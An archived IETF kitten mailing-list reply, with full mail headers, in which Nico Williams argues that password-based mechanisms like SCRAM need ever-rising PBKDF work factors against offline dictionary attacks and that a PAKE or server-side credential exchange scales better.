IETF Logo Mail Archive

Re: [kitten] [EXTERNAL] Re: Windows Intent to revive and implement IAKerb draft-ietf-kitten-iakerb-03

Nico Williams <nico@cryptonector.com> Mon, 20 February 2023 00:21 UTC

Return-Path: <nico@cryptonector.com>
X-Original-To: kitten@ietfa.amsl.com
Delivered-To: kitten@ietfa.amsl.com
Received: from localhost (localhost [127.0.0.1]) by ietfa.amsl.com (Postfix) with ESMTP id 54CF4C14CEFF for <kitten@ietfa.amsl.com>; Sun, 19 Feb 2023 16:21:26 -0800 (PST)
X-Virus-Scanned: amavisd-new at amsl.com
X-Spam-Flag: NO
X-Spam-Score: -2.098
X-Spam-Level:
X-Spam-Status: No, score=-2.098 tagged_above=-999 required=5 tests=[BAYES_00=-1.9, DKIM_SIGNED=0.1, DKIM_VALID=-0.1, DKIM_VALID_AU=-0.1, DKIM_VALID_EF=-0.1, RCVD_IN_DNSWL_NONE=-0.0001, RCVD_IN_MSPIKE_H2=-0.001, RCVD_IN_ZEN_BLOCKED_OPENDNS=0.001, SPF_HELO_NONE=0.001, SPF_PASS=-0.001, URIBL_DBL_BLOCKED_OPENDNS=0.001, URIBL_ZEN_BLOCKED_OPENDNS=0.001] autolearn=ham autolearn_force=no
Authentication-Results: ietfa.amsl.com (amavisd-new); dkim=pass (2048-bit key) header.d=cryptonector.com
Received: from mail.ietf.org ([50.223.129.194]) by localhost (ietfa.amsl.com [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id DgmsvBMSynw9 for <kitten@ietfa.amsl.com>; Sun, 19 Feb 2023 16:21:22 -0800 (PST)
Received: from bumble.birch.relay.mailchannels.net (bumble.birch.relay.mailchannels.net [23.83.209.25]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (No client certificate requested) by ietfa.amsl.com (Postfix) with ESMTPS id 4EF32C14F744 for <kitten@ietf.org>; Sun, 19 Feb 2023 16:21:22 -0800 (PST)
X-Sender-Id: dreamhost|x-authsender|nico@cryptonector.com
Received: from relay.mailchannels.net (localhost [127.0.0.1]) by relay.mailchannels.net (Postfix) with ESMTP id 4AFD4920C1E; Mon, 20 Feb 2023 00:21:21 +0000 (UTC)
Received: from pdx1-sub0-mail-a299.dreamhost.com (unknown [127.0.0.6]) (Authenticated sender: dreamhost) by relay.mailchannels.net (Postfix) with ESMTPA id D74E5920B7E; Mon, 20 Feb 2023 00:21:20 +0000 (UTC)
ARC-Seal: i=1; s=arc-2022; d=mailchannels.net; t=1676852480; a=rsa-sha256; cv=none; b=HXcBGCBb0A7voZOi3yLO2ujheGdFpWVDT2yJhGhiYTMHX9zscAy6Omf7YpkC5KUz/rIZkP i/k/d13LZH5B1HktuDD9N7J6i0MvdnObEVjbqyLSH0x+sB5QI7UotlDpM2HmuG35lFDNHK 0NXLqHdwNSEVYuvXIhadKq+T7DbeyYN3V0hb4e9IYtIC+qOb/7Ic7rISMz/6HNLZKV4PP2 grfA1zOyd/5u/RYGHs+G+8rnHAPQSWAUVs0iqVtQmgKuxBoJOu2UOe7e4zImP3MGyqqzRk Uw0DMToShmaJ1aXYwPnW5sJX1dYndjAWakp9F9RVAy/RCDB03489/gpxCFrS1A==
ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=mailchannels.net; s=arc-2022; t=1676852480; h=from:from:reply-to:subject:subject:date:date:message-id:message-id: to:to:cc:cc:mime-version:mime-version:content-type:content-type: content-transfer-encoding:content-transfer-encoding: in-reply-to:in-reply-to:references:references:dkim-signature; bh=oHGrhibENghqPk9lw+2475LKDHTISehLyCacjw23CqU=; b=ltQu8/kmcIqHUrbsBHgBnFCnXnq+YkzuTqHqanhCKzcO/yMnBrl60SE9Tqq6zQ9cX5PiR7 HgvlpKxbp8HqFcwcynh3+dd0YsKD+v7LNb+pqGtZ880kdJbiyE0zLL9mdDRjTw+uGGcCLk O5OaG34MOtE67X0ssWS1bKOrrxQ6iTPJ7AdcYzHCTAc059iQWeSksqcXjP4MBqi1gh0f8y QPfUd12lFAOa1s/IwO83XlEyEdzmayeCNT9FUPRGkzPgpKj481VL1E6Rz3wiUoeWMD7jCK TGWW5U1OmLwMxoEQwwSGHcWSEPCVVbYSNktJHG9Vp5/Co3mXlzZt2t/JAmPBhg==
ARC-Authentication-Results: i=1; rspamd-9788b98bc-7d76t; auth=pass smtp.auth=dreamhost smtp.mailfrom=nico@cryptonector.com
X-Sender-Id: dreamhost|x-authsender|nico@cryptonector.com
X-MC-Relay: Neutral
X-MailChannels-SenderId: dreamhost|x-authsender|nico@cryptonector.com
X-MailChannels-Auth-Id: dreamhost
X-Shrill-Well-Made: 733c10e20dd8f0bd_1676852481121_3969859661
X-MC-Loop-Signature: 1676852481121:1948894327
X-MC-Ingress-Time: 1676852481121
Received: from pdx1-sub0-mail-a299.dreamhost.com (pop.dreamhost.com [64.90.62.162]) (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384) by 100.109.196.241 (trex/6.7.1); Mon, 20 Feb 2023 00:21:21 +0000
Received: from gmail.com (075-081-095-064.res.spectrum.com [75.81.95.64]) (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits) key-exchange ECDHE (P-256) server-signature RSA-PSS (2048 bits) server-digest SHA256) (No client certificate requested) (Authenticated sender: nico@cryptonector.com) by pdx1-sub0-mail-a299.dreamhost.com (Postfix) with ESMTPSA id 4PKjl36Dx9z3S; Sun, 19 Feb 2023 16:21:19 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=cryptonector.com; s=dreamhost; t=1676852480; bh=oHGrhibENghqPk9lw+2475LKDHTISehLyCacjw23CqU=; h=Date:From:To:Cc:Subject:Content-Type:Content-Transfer-Encoding; b=n++5lHhJfNls5Kmlkwlosy3jJmp6BS4lKnJEKRfwuSUktkRixg6l2e8uXrN4wSf9x cunKqRV804SKkqpbyaHmalmXC79IC9qp23s91LWEASMH8XNAJzXKYtnENeK39anudj T3pVzrrfdsPMp0ysaFij4MQmPuEjWepc7YHmFFynbS1NmVCZ3JgSG2TGaq2W/hS9a6 zGMcsmygaWclglzKwB1kVq0Y1I2r8mU7+U5BT5/Cq4UonTLn9yfzyLY5bN2hZj0rco s6ycRVTDnBRlLxm7PYBF5BWa8GRJI3hiJ04uNORYKcN9vnBbLsKqc/d6gmW7KDPsOQ 7y9wHVlyJ8Tcg==
Date: Sun, 19 Feb 2023 18:21:17 -0600
From: Nico Williams <nico@cryptonector.com>
To: Paul Romero <paulr@rcom-software.com>
Cc: kitten@ietf.org
Message-ID: <Y/K8/XnSgbPfnTm9@gmail.com>
References: <MW4PR21MB1970A9D254B943A1763C55FF9CA09@MW4PR21MB1970.namprd21.prod.outlook.com> <de4cbe7b-85b5-7001-3a8c-74787990c6e0@secure-endpoints.com> <eb9fa7a4-a00d-f388-27aa-3624df8ce4f2@secure-endpoints.com> <MW4PR21MB197060FB388E7922FAADEB079CA19@MW4PR21MB1970.namprd21.prod.outlook.com> <6cb6f5ddfc7b9b150b4eef72db5a3f3b9566fd80.camel@redhat.com> <20230219194355.36139173DDE@pb-smtp2.pobox.com> <Y/K2IEhX6c+b05Ye@gmail.com> <87b6479d-63d7-b31a-d2e2-b7bd6f9a9c65@rcom-software.com>
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
In-Reply-To: <87b6479d-63d7-b31a-d2e2-b7bd6f9a9c65@rcom-software.com>
Archived-At: <https://mailarchive.ietf.org/arch/msg/kitten/Pcra5fi1Obe0XY1NFp_Aax1FqFc>
Subject: Re: [kitten] [EXTERNAL] Re: Windows Intent to revive and implement IAKerb draft-ietf-kitten-iakerb-03
X-BeenThere: kitten@ietf.org
X-Mailman-Version: 2.1.39
Precedence: list
List-Id: Common Authentication Technologies - Next Generation <kitten.ietf.org>
List-Unsubscribe: <https://www.ietf.org/mailman/options/kitten>, <mailto:kitten-request@ietf.org?subject=unsubscribe>
List-Archive: <https://mailarchive.ietf.org/arch/browse/kitten/>
List-Post: <mailto:kitten@ietf.org>
List-Help: <mailto:kitten-request@ietf.org?subject=help>
List-Subscribe: <https://www.ietf.org/mailman/listinfo/kitten>, <mailto:kitten-request@ietf.org?subject=subscribe>
X-List-Received-Date: Mon, 20 Feb 2023 00:21:26 -0000

On Sun, Feb 19, 2023 at 04:04:29PM -0800, Paul Romero wrote:
> I don't  agree that SCRAM is obsolete and am curious why
> you think that is the case. I've used it quite a while and
> never experienced a security breach.  The only problem
> I have come up against is the configuration of the end to end
> secret.

Because it requires constantly increasing the work factor that keeps
offline dictionary attacks from being reasonable.  As clouds get faster,
more accessible, and (maybe) cheaper, the PBKDF work factor parameters
that protect protocols like SCRAM (and Kerberos' non-PAKE password-based
pre-auth methods) have to keep increasing.

A PAKE would be better, naturally, but either way password-based
mechanisms don't scale to large networks unless they are only used at
authentication servers that trade proof of password knowledge for other
temporary credentials.

Nico
--

v2.23.0 | Report a Bug | By Email